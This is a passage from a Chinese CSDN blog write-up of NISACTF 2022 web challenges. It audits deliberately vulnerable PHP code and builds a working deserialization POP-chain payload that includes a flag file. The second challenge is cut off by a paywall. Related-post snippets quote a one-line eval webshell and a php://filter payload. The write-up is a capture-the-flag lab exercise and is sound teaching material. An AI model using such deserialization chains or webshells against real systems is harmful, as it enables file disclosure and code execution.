[NISACTF 2022]

已于 2022-09-09 21:27:50 修改
阅读量6k 收藏 16
点赞数 9
分类专栏: nssctf 文章标签: php 安全
于 2022-09-09 19:31:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/126754893
版权

目录

前言:

[NISACTF 2022]popchains

[NISACTF 2022]babyserialize

考点:

解题:

解法二:利用 php

 总结:

[NISACTF 2022]easyssrf

[NISACTF 2022]level-up

level 1

level2

Level___3.php

level 4

level5

 [NSSCTF 2022 Spring Recruit]ezgame

[NISACTF 2022]checkin

 [NISACTF 2022]babyupload

[NISACTF 2022]middlerce

[NISACTF 2022]hardsql

前言:

没时间参加比赛,来复现一下。

[NISACTF 2022]popchains

__invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法
__construst():具有构造函数的类在创建新对象的时候,回调此方法
__destruct():反序列化的时候,或者对象销毁的时候调用
__wakeup():反序列化的时候调用
__sleep():序列化的时候调用
__toString():把类当成字符串的时候调用,一般在echo处生效
__set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
__get():读取不可访问或者不存在的属性的时候,进行赋值
__call():在对象中调用一个不可访问的方法的时候,会被执行

进入环境:

直接是代码审计环节:

Happy New Year~ MAKE A WISH
<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/

一般的思路,都是先看出口,也就是我们能够利用的点。

这里看到

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);}

Try_work_Hard 类中 有个文件包含,我们追加上去看看哪里调用了 append 函数。

    public function __invoke(){
        $this->append($this->var);
    }
}

类中的 __invoke 方法 调用了append 传入的$var 。__invoke 的定义是,当一个对象被当函数一样调用的时候 例如: 

$a = new test();
$a ();

这样就会触发 __invoke 方法. 那么我们继续追踪 哪里可以调用 __invoke。.

看到 Class MAKE_a_Change 类中:

   public function __get($key){
        $function = $this->effort;
        return $function();
    }
}

把$func 对象当作了函数来调用。而定义的__get 该如何 调用呢?

__get 魔术方法 是当访问一个类中的属性不存在或者privte 的时候 会被调用。

在 Class Road_Is_Long 中:

    public function __toString(){
        return $this->string->page;
    }

如果 $this ->string = MAKE_a_Change的话,就会访问其page 属性,而其类中没有此方法则会调用__get()

那么再来看看 __toString 方法如何调用:

定义是 __toString(),类被当成字符串时触发。

找了半天,没找到哪里有echo ,只有这个地方有echo, 应该就是 正则匹配这个地方 ,如果$page 是一个对象,那么进入正则 $this->page 当做了字符串去匹配了。也就触发了 __toString

那应该就是 把payload 打进去 就自动触发 __toString 了吧 。

整理下思路:

 __wakeup() -> 创建 page 为Road_is_Long 类本身   => __toString ->  $this->Make_a_change => __get () $this->effort = make_a_change()=> __invoke()  -> => append() => include($value); value=flag.php 。

好,构造。

<?php
class Road_is_Long{
    public $page;
    public $string;

}
class Try_Work_Hard{
    protected  $var = "/flag";
}
class Make_a_Change{
    public $effort;

}

$road1 = new Road_is_Long();
$road2 = new Road_is_Long();
$try = new Try_Work_Hard();
$make = new Make_a_Change();

$road1->page = $road2;
$road2->string=$make;
$make->effort=$try;

$ser = serialize($road1);
echo urlencode($ser);

直接传入就得到flag。

[NISACTF 2022]babyserialize

考点:

php反序列化pop链构造。

代码审计。

解题:

__invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法
__construst():具有构造函数的类在创建新对象的时候,回调此方法
__destruct():反序列化的时候,或者对象销毁的时候调用
__wakeup():反序列化的时候调用
__sleep():序列化的时候调用
__toString():把类当成字符串的时候调用,一般在echo处生效
__set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
__get():读取不可访问或者不存在的属性的时候,进行赋值
__call():在对象中调用一个不可访问的方法的时候,会被执行

直接来吧:

<?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    pu
最低0.47元/天 解锁文章
snowlyzz
关注
  • 9
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[NISACTF 2022]popchains - 反序列化+伪协议
oZuoShen123的博客
10-07 1448
链条:Road_is_Long(construct->wakeup【page=$r】-> toString【string=$m】)-> Make_a_Change(construct->get【effort=$t】)-> Try_Work_Hard(invoke->append【var='php://filter/read=convert.base64-encode/resource=/flag'】)
[NISACTF 2022]middlerce
m0_70819573的博客
03-08 469
preg_match过滤了换行符和异或符号,所以考虑利用preg_match本身回身回溯超过1000000会返回false绕过。1.eval的执行逻辑和create_function或有相似之处,绕过方式几乎一样。2.很显然需要做fuzz测试。1.打开环境,审计代码。
(超详细)[NISACTF 2022]hardsql——writeup
qq_74426248的博客
07-25 400
本文章为[NISACTF 2022]hardsql——writeup,欢迎各位师傅一起讨论!!!
NSSCTF中的popchains、level-up、 What is Web、 Interesting_http、 BabyUpload
最新发布
2401_82388450的博客
06-05 1047
@eval($_POST[shell]);
NSSCTF-Misc刷题记录
Rick66Ashley的博客
09-15 232
-----------------------------------------------分割线------------------------------------------------------------------------1.首先黑客得传脚本文件,所以找post请求http.request.method=="POST",然后webshell嘛,可能是php,jsp或者asp,找php,发现1.php,当然,这只是猜测,那为了证实猜测,找到了这个。集中整理一下 也许明天继续。
[NISACTF 2022]checkin
m0_60716947的博客
10-18 1131
010 editor使用
NSS [NISACTF 2022]middlerce
Jay17的博客
09-21 900
NSS [NISACTF 2022]middlerce
[NISACTF 2022]babyupload
ph0ebus的博客
02-01 811
从一道赛题学习利用os.path.join() 处理路径拼接的问题
nssctf web 入门(3)
qq_61988806的博客
04-13 1145
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
[NISACTF 2022]上
qq_62046696的博客
07-26 3694
php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
[NISACTF 2022]babyserialize - 反序列化(waf绕过)【*】
oZuoShen123的博客
10-07 992
1、分析链条和属性   链条:`TianXiWeis(__wakeup)-> Ilovetxw(__call)-> four(__set) -> Ilovetxw(__toString)-> NISA(__invoke)`   属性:`TianXiWeis(ext=$i)-> Ilovetxw(huang=$f)-> four(fun="sixsixsix";a=$i)-> Ilovetxw(su=$n)-> NISA(txw4ever=命令)`
[NISACTF 2022]popchains
m0_73612768的博客
01-04 978
PHP 反序列化,preg_match 触发 __toString 魔术方法;
NSSCTF-Web刷题记录一
plant1234的博客
03-11 1374
通过题目分析要去查看flag.php内容,进行实现,所以以Try_Work_Hard为链子低端进行分析首先要利用的是include函数,但需要用__invoke方法来调用__invoke的触发条件是:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用所以我们要找一个可以被控制且被调用的函数给它赋值Try_Work_Hard对象该类中在__get()方法可以实现这一功能,但__get()方法的触发需要:从不可访问的属性读取数据。
[NISACTF 2022]babyupload(wp)
wikey 的博客
03-30 538
有一个小问题,我们在尝试上传图片马也就是//php木马时,burp会自行改形式为image/jpeg图片内容,我们既然需要伪造//flag文件,就需要改相应的格式。如: text/plain。这道题学会了个新姿势就是当res[0]为绝对路径时,我们可以直接跳转到最后文件地址而不需要补齐界面的文件,直接跳转//flag界面。所以用burp修改文件名为 //flag,跳转就读取到//flag文件了。当res[0]为绝对路径时,打开的就是绝对路径,不会进行拼接。给了上传地址直接访问就可。
[Reverse]NISACTF 2022 string
qq_24481913的博客
12-24 223
C 库函数 void srand(unsigned int seed) 播种由函数 rand 使用的随机数发生器。
[NISACTF 2022]WriteUp web篇
Pysnow's Blog
04-01 4460
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
NISACTF 2022 MISC 部分WP
qq_51447967的博客
04-28 2166
[NISACTF 2022]bilala的二维码 题目提示如下 bilala说,里面会不会还藏着什么东西呢,图片分辨率好像有用诶,压缩包密码好像和战队名字相关 下载得到一张缺少定位符号的二维码,手动补全,然后扫描。 扫描得到一个URL,如下 https://video.gz2.com.cn/h666G/h666G_kzwIVy 进去下载得到一张图片,如下 对图片进行分析 可以看到第一张图片后面又附加了一张图片,然后第二张图片后面有个压缩包,全部提取出来。 看了下图片没有发现什么,然后去分析压
【[NISACTF 2022]join-us
qq_40567274的博客
04-08 790
[NISACTF 2022] 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录[NISACTF 2022]前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:
[NSSCTF][SCTF 2021]WEB复现
cosmoslin的博客
03-09 1933
感谢NSSCTF提供复现环境 loginme middleware.go package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != "" { c.Abor
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值